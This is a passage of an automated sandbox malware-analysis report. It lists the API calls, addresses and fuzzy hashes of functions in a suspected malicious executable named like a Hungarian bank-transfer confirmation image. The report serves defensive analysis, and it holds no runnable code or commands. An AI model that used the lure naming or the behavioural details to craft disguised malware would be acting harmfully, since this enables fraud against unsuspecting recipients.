                                                                                                          • API String ID: 1834419854-3405671355
                                                                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • _wprintf.LIBCMT ref: 00454074
                                                                                                          • __swprintf.LIBCMT ref: 004540A3
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                          • API String ID: 455036304-4153970271
                                                                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                          APIs
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                          • _memmove.LIBCMT ref: 00467EB8
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                          • _memmove.LIBCMT ref: 00467F6C
                                                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2170234536-0
                                                                                                          • Opcode ID: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                          • Opcode Fuzzy Hash: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3096461208-0
                                                                                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                          APIs
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                          • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                          • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3218148540-0
                                                                                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 136442275-0
                                                                                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                          APIs
                                                                                                          • _wcsncpy.LIBCMT ref: 00467490
                                                                                                          • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • _wcstok.LIBCMT ref: 004674FF
                                                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                          • String ID: X
                                                                                                          • API String ID: 3104067586-3081909835
                                                                                                          • Opcode ID: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                                                                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                          • Opcode Fuzzy Hash: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                                                                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                          APIs
                                                                                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                          • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                          Strings
                                                                                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                          • String ID: NULL Pointer assignment
                                                                                                          • API String ID: 440038798-2785691316
                                                                                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                          APIs
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                          • _wcslen.LIBCMT ref: 004610A3
                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                                                          • String ID: ThumbnailClass
                                                                                                          • API String ID: 4136854206-1241985126
                                                                                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                                                          APIs
                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                          • String ID: 2
                                                                                                          • API String ID: 1331449709-450215437
                                                                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
